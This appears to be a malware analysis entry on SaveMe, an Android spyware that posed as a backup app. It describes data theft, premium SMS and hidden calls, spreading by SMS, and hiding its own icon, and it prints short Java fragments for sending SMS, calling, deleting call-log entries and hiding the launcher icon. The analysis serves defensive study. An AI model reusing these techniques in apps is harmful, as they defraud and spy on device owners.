SaveMe
Summary
Details
SaveMe is a spyware discovered in January 2015. It presents itself as a standalone application that is supposed to backup contacts and SMS messages. SaveMe seems to be a variant of another malware known as SocialPath. The application has been available on Google Play before being removed.
Stage 1: Sensitive data recovery
When the application is launched, it asks to the user his name and phone number and saves these inputs in its local database user_info4. In background, the activity collects the device’s MAC address, network operator name and ISO country code. Those information are then all sent to a master server, located at http://xxxxmarketing.com [1] (no longer available).
The visible part of the application offers features such as: add or delete a contact, save or restore your phonebook, save all your SMS messages and write a SOS message that will be sent to all your contacts in case your phone has been stolen. If you choose to save your messages, the application will save all the content of content://sms/inbox and content://sms/sent in its local database user_info and send it to the server.
Stage 2: Execute the master commands
In parallel, when the application is launched, a service named CHECKUPD is started (it also starts each time the device is rebooted). This service is used as a handshake between the device and the server. It executes three AsyncTask namely sendmyinfos(), sendmystatus() and senddata() for dialoging with the server. After those exchanges, the main service GTSTSR is executed. The purpose of this service is to contact the server in order to get commands to be executed. Depending on the answer given by the server, the service can perform different actions as detailed below.
First, it can send a text message to any number given by the server. We believe that this can be used for premium services as stated in [2].
if (GTSTSR.Mac.equals(this.address) && GTSTSR.Send_ESms.equals("SESHB")){ new update().var(this.address,"","SESFK","","","","",""); SmsManager.getDefault().sendTextMessage(GTSTSR.EXT_SMS, null, GTSTSR.SMS, null, null); return; }
The service can also make a call by starting a service named RC. This service displays a WebView on the screen, probably to hide the call and makes a call to a potentially premium number given by the server [2].
Intent localIntent = new Intent("android.intent.action.CALL"); localIntent.setData(Uri.parse("tel:" + EXT_CALL)); intent.addFlags(268435456); intent.addFlags(4); this.startActivity(intent);
After few moments, the service ends the call, removes the WebView and deletes the call in the call log by calling the function DeleteNumFromCallLog().
final Uri parse = Uri.parse("content://call_log/calls"); contentResolver.delete(parse, "number=?", new String[]{s});
GTSTSR can also start a service named CO which will automatically fetch all the contacts of the victim and send them to the server. The main difference compared with the official feature of the application (except that there is no need to click on a button) is that CO will also steal contacts stored in the SIM card by reading content://icc/adn. Contacts are then stored in the database user_info before being sent.
The last feature provided by GTSTSR is the sending of text messages to victim’s contacts by starting the service SCHKMS. The service checks the database user_info, picks one contact and sends him a message. This feature is used for spreading the malware via SMS containing a link [2]. Of course, the service deletes the SMS from the logs in order to hide it to the victim.
To finish with this malware, we observed a piece of code in the activity pack which allows the app to remove its icon from the launcher, in order to hide itself. This way, the victim may forget to uninstall the application. Nevertheless, this activity is never used in this sample.
this.getPackageManager().setComponentEnabledSetting(this.getComponentName(), COMPONENT_ENABLED_STATE_DISABLED, DONT_KILL_APP);
[1] | We intentionally anonymzed the URL |
[2] | (1, 2, 3) http://blog.lifars.com/2015/01/11/warning-mobile-privacy-tools-socialpath-and-save-me-are-malware/ |
Other resources
- Google Play app SocialPath with malware: promises to protect the user and instead light
- Mobile Threat Monday: SaveMe Malware Infiltrates Google Play
- The privacy tool that wasn’t: SocialPath malware pretends to protect your data, then steals it
- Warning: Mobile Privacy Tools “SocialPath” and “Save Me” Are Malware
Triggering
Caracteristics
Malware type :
- Fee paying services
- Remote Administration Tool (RAT)
- Spyware
Attacks :
-
Confidentiality
-
Normal use
Infection technique : Standalone application
Malicious code type :
- Use Java code
Hidding techniques :
- Obfuscation with reflexion
- Remove its launcher icon
Triggering techniques :
- Executed at launch
- Waits for a particular intent
Samples
Java source code extracts:
CHECK.java is the function used in the GTSTSR service to switch between commands given by the C&C server.RC.java is the part of code used in the RC service to display the WebView on the screen just before making a phone call.
callnow.java is the function used in the RC service to make a phone call.
HGP.java is the class used to end the phone call, we can see use of Java reflection.
DeleteNumFromCallLog.java is the function used to delete a line in the call logs.
allSIMContact.java is the function used in the CO service to steal all the contacts stored in the SIM card.
fetchContacts.java is the function used in the SCHKMS service to pick out one contact and send him a SMS.
pack.java is the class used to hide the launcher icon, but this class is never used in the analyzed sample.